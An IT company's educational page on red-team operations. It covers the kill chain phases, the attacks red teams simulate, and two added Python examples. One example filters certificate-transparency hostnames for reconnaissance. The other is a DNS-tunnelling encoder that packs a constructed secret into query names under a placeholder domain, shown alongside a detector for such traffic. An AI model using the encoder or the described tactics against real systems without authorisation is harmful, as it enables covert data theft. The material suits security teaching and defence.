Red Team Operation Basics
Successful cyber-attacks typically pass through the seven phases of the cyber "kill chain", in which the exploitation of an existing vulnerability is a critical step. The term "kill chain" originated in the armed forces to describe the structure of an attack. Organizations commission a Red Team Operation to discover security weaknesses through hands-on testing: it uncovers exposures and blind spots in processes, physical security and network defenses. Whereas a penetration test focuses on a single application or system at a time, a Red Team operation works across a much broader landscape and tries every plausible means of attack against agreed objectives.
Red Team members follow the offensive method, while the Blue Team's objective is to defend against the attack. Usually the Blue Team is not told the what, where and how of the Red Team's plan, so that the whole operation is conducted in as realistic an environment as possible.
What is Red Team Operation?
Red Teaming is a form of security assessment in the information security domain. As a pre-evaluation measure, Red Team members identify the risk to an organization's network infrastructure; to determine those risks, the operators' primary responsibility is to recognize potential threats and vulnerabilities. Red Team operators use a range of tools, open-source or commercial, to discover vulnerabilities and exploit them to their advantage. The prime objectives are to Exploit, Compromise and Circumvent.
Think like a hacker!!!
Hackers almost always possess an analytic and creative mindset. To compromise a security system they devise ingenious, unconventional methods, and to reach their goals they take serpentine and circuitous routes that are difficult to follow.
Red Team Operation Methodology
The "Cyber Kill Chain" concept provides a comprehensive framework for conducting a Red Team Operation. It was developed by Lockheed Martin as part of its Intelligence Driven Defense model.
1. Reconnaissance
The first phase of a Red Team operation focuses on collecting as much information as possible about the target. Reconnaissance, also called information gathering, is one of the most critical steps. It is done with public tools such as Maltego, SpiderFoot, Intrigue and Shodan, while social media and search engines such as LinkedIn, Google, Twitter, Facebook and Instagram are used to learn about employees, their daily routines, habits and more. As a result it is usually possible to learn a great deal about the target's people, technology, surroundings and environment. This step also involves building or acquiring the specific tools needed for the engagement.
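As an added example (not tooling from the original page), the following Python script shows one small piece of passive reconnaissance: collating hostnames from certificate-transparency records and discarding anything outside the agreed scope. The record layout mimics the JSON that crt.sh returns (a `name_value` field with newline-separated names), but the records themselves are constructed for the example rather than fetched, and example.com stands in for the client's domain.

```python
"""Passive reconnaissance helper: collate hostnames from certificate-
transparency records and keep only in-scope names.

Added example, not the page's own tooling. The record shape mimics the
JSON returned by crt.sh ("name_value" and "common_name" fields), but the
records below are constructed for the example, not fetched from anywhere.
"""
import json
from collections import Counter

# Constructed sample, shaped like crt.sh JSON output for ?q=%.example.com
SAMPLE_CT_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "www.example.com",
     "name_value": "www.example.com\nexample.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "*.staging.example.com",
     "name_value": "*.staging.example.com\nstaging.example.com"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "common_name": "vpn.example.com",
     "name_value": "VPN.example.com\nmail.example.com\nmail.example.com"},
    # a look-alike domain that a careless suffix match would treat as in scope
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "example.com.evil-lookalike.net",
     "name_value": "example.com.evil-lookalike.net"},
])


def in_scope(hostname: str, scope_domain: str) -> bool:
    """True if hostname is scope_domain itself or a subdomain of it.
    A plain suffix check would accept 'notexample.com'; anchor on the dot."""
    hostname = hostname.lower().rstrip(".")
    scope_domain = scope_domain.lower().rstrip(".")
    return hostname == scope_domain or hostname.endswith("." + scope_domain)


def extract_hostnames(ct_json: str, scope_domain: str) -> list[str]:
    """Return sorted, de-duplicated in-scope hostnames from crt.sh-style JSON.
    Wildcard entries (*.x) are reduced to their base label: a wildcard cert
    tells you the zone exists, not which concrete hosts do."""
    names = set()
    for record in json.loads(ct_json):
        for raw in record.get("name_value", "").split("\n"):
            name = raw.strip().lower()
            if name.startswith("*."):
                name = name[2:]
            if name and in_scope(name, scope_domain):
                names.add(name)
    return sorted(names)


def issuer_summary(ct_json: str) -> Counter:
    """Count issuing CAs; a CA that appears only once in the target's history
    often points at a team or system that procures its own certificates."""
    return Counter(record["issuer_name"] for record in json.loads(ct_json))


if __name__ == "__main__":
    for host in extract_hostnames(SAMPLE_CT_JSON, "example.com"):
        print(host)
    print(issuer_summary(SAMPLE_CT_JSON).most_common())
```

The scope filter is the part worth copying: a naive suffix match would accept `example.com.evil-lookalike.net`, and a red team that touches hosts outside the rules of engagement has a legal problem, not a finding.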
2. Weaponization
Weaponization builds on the intelligence gathered during reconnaissance about the target's infrastructure, facilities and employees. Open-source intelligence can be quite telling about a target, its people, its facilities and its technical makeup, such as physical and logical security controls, foot traffic, terrain and infiltration/exfiltration points. Through deep analysis, a picture of the target and its primary operations begins to emerge.
Effective weaponization means preparing the operation specifically for the target, taking full account of the intelligence gathered in the reconnaissance stage. This commonly includes crafting custom malicious file payloads, preparing RFID cloners, configuring hardware trojans, acquiring social-engineering costumes, creating falsified personas and companies, and much more.
3. Delivery
The Delivery stage is the critical stage of the execution phase: it marks the active launch of the Red Team operation in its entirety. Here the Red Team consultants carry out the actions against the target(s) intended to reach the operation's goals: physically cloning badges, social-engineering targets face to face, analyzing cyber vulnerabilities, planting hardware trojans for remote network persistence, and so on. One of the most important objectives is to note the best opportunities for exploitation.
4. Exploitation
Exploitation is exactly what it sounds like. At this point the goal is to "break in": compromise servers, applications and networks, bypass physical controls (e.g. gates, fences, locks, radar, motion detection, cameras) and exploit target staff through social engineering, whether face to face or by email, phone, fax or SMS. The exploitation stage sets up the escalation and installation phases.
5. Installation
The installation stage's primary goal is to prepare for persistence. This can be cyber persistence or physical persistence, although cyber persistence is generally slightly more common. During this stage the Red Team establishes a beachhead by building on the footholds gained in the exploitation step: privilege escalation on compromised servers, shells, installation of malicious file payloads, use of physical key impressions and lock-picked doors all happen here.
6. Command and Control
Maintaining persistence is the goal of Command & Control. A cyber-focused Red Team takes steps to ensure that remote access to exploited systems is stable and reliable, which sets the stage for data exfiltration and other post-exploitation tasks. On the physical and social side, the key objectives are manipulating people into helping circumvent physical barriers so as to create backdoors into facilities.
7. Actions on Objective
During this phase the team aims to complete the mission and achieve the objectives agreed between the client and the Red Team. Actions on objective are carried out through lateral movement across the cyber environment as well as the physical facilities: pivoting from compromised systems and from breached physical security controls, all the while capturing video, audio and photographic evidence to support each finding. Ultimately the team aims to exfiltrate the data, information or physical assets the target considers most sensitive.
Some of the attacks simulated during a Red Team Operation
- Remote attacks via the Internet
- DNS tunneling
- ICMP tunneling
- Intrusion attempts
- Insider threat
- VPN-based attacks
- Access card copying and strength testing
- Identity spoofing
- HID (human interface device) attacks, e.g. keystroke-injecting USB devices
- Fake WAP (rogue wireless access point)
- Spoofing
- Lazy or broken processes
- Zombies/bots
- Attacks on physical security
- Stolen authentication tokens
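DNS tunneling, listed above, is worth seeing from both sides. The Python below is an added example, not code from the original page: `encode_chunks` shows how a red team smuggles a payload out as base32 labels under a domain it controls (`tun.example` is a placeholder), `decode_chunks` is the receiving end, and `flag_tunnel_zones` is the kind of heuristic a blue team runs over resolver logs to catch it. The payload and the log lines are constructed for the example, and the log format `<time> <client> <qname> <qtype>` is an assumption rather than any particular resolver's format.

```python
"""DNS tunnelling: the encoder a red team uses to exfiltrate data in query
names, and a log heuristic a blue team can use to spot it.

Added example, not from the original page. TUNNEL_DOMAIN is a placeholder
for a domain the red team controls; the payload and resolver log lines are
constructed, and the log format '<time> <client> <qname> <qtype>' is an
assumption rather than any particular resolver's format."""
import base64
import math
from collections import Counter, defaultdict

MAX_LABEL = 63   # RFC 1035 limit on a single label
MAX_NAME = 253   # practical limit on a full domain name
TUNNEL_DOMAIN = "tun.example"
# Constructed "loot": a fake account export the red team wants to exfiltrate.
SECRET = b"export: " + b"".join(b"acct%04d,balance=%d;" % (i, 1000 * i) for i in range(12))


# ---- offensive side: encode data into query names -------------------------
def encode_chunks(data: bytes, tunnel_domain: str, chunk_len: int = 30) -> list[str]:
    """Split data into numbered base32 labels: '<seq>.<base32>.<tunnel_domain>'.
    base32 is DNS-safe (letters and digits, case-insensitive); '=' padding is
    stripped here and restored on decode. 30 bytes -> 48 characters, under
    the 63-character label limit."""
    names = []
    for seq, offset in enumerate(range(0, len(data), chunk_len)):
        label = base64.b32encode(data[offset:offset + chunk_len]).decode().rstrip("=").lower()
        name = f"{seq}.{label}.{tunnel_domain}"
        if len(label) > MAX_LABEL or len(name) > MAX_NAME:
            raise ValueError("chunk_len too large for a DNS name")
        names.append(name)
    return names


def decode_chunks(names: list[str], tunnel_domain: str) -> bytes:
    """Reassemble on the receiving side. Queries may arrive out of order, so
    the sequence label decides the order, not arrival."""
    suffix = "." + tunnel_domain
    parts = {}
    for name in names:
        seq, label = name[:-len(suffix)].split(".", 1)
        label = label.upper() + "=" * (-len(label) % 8)   # restore padding
        parts[int(seq)] = base64.b32decode(label)
    return b"".join(parts[k] for k in sorted(parts))


# ---- defensive side: score resolver logs per zone -------------------------
def zone_of(qname: str) -> str:
    """Crude registered-domain guess: the last two labels. Real tooling
    should use the public suffix list (co.uk and friends)."""
    return ".".join(qname.split(".")[-2:])


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded data scores high, human-chosen names low."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def flag_tunnel_zones(log_lines, min_unique=5, len_threshold=30.0, entropy_threshold=3.5):
    """Group queries by zone and flag zones with many distinct subdomains that
    are, on average, long or high-entropy. Numerous-but-short names (a CDN's
    a1, a2, ...) pass the count gate but not the length/entropy gate."""
    per_zone = defaultdict(set)
    for line in log_lines:
        fields = line.split()
        if len(fields) < 4:
            continue            # skip malformed lines rather than crash
        qname = fields[2].lower().rstrip(".")
        per_zone[zone_of(qname)].add(qname)
    flagged = {}
    for zone, qnames in per_zone.items():
        subs = [q[:-(len(zone) + 1)] for q in qnames if q != zone]
        if len(subs) < min_unique:
            continue
        mean_len = sum(len(s) for s in subs) / len(subs)
        mean_ent = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        if mean_len >= len_threshold or mean_ent >= entropy_threshold:
            flagged[zone] = {"unique": len(subs), "mean_len": round(mean_len, 1),
                             "mean_entropy": round(mean_ent, 2)}
    return flagged


def build_sample_log() -> list[str]:
    """Constructed resolver log: ordinary traffic, a CDN, and the tunnel."""
    lines = ["10:00:01 10.1.2.3 www.example.com A",
             "10:00:02 10.1.2.3 mail.example.com MX",
             "10:00:03 10.1.2.4 vpn.example.com A",
             "10:00:04 10.1.2.4 intranet.example.com A"]
    lines += [f"10:00:{5 + i:02d} 10.1.2.5 a{i}.cdn.example A" for i in range(6)]
    lines += [f"10:01:{i:02d} 10.1.2.9 {name} TXT"
              for i, name in enumerate(encode_chunks(SECRET, TUNNEL_DOMAIN))]
    return lines


if __name__ == "__main__":
    names = encode_chunks(SECRET, TUNNEL_DOMAIN)
    print(f"{len(SECRET)} bytes -> {len(names)} queries, e.g. {names[0]}")
    assert decode_chunks(names, TUNNEL_DOMAIN) == SECRET
    for zone, stats in flag_tunnel_zones(build_sample_log()).items():
        print("suspicious zone:", zone, stats)
```

The heuristic is deliberately simple: volume alone is a poor signal (CDNs and telemetry produce thousands of distinct names), so it gates on label length and entropy as well. Conversely, a red team that wants to stay quiet keeps chunks short, adds a slow cadence and uses a domain with believable-looking subdomains, which is exactly why the detection side should be reported back to the client along with the exfiltration that succeeded.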
A Red Team Operation can help an organization improve its ability to defend against, and respond to, attacks that put business operations, data and reputation at risk.
9T9 Information Technology
Bahrain
Road 7129, Block 571,
Email: info@9t9it.com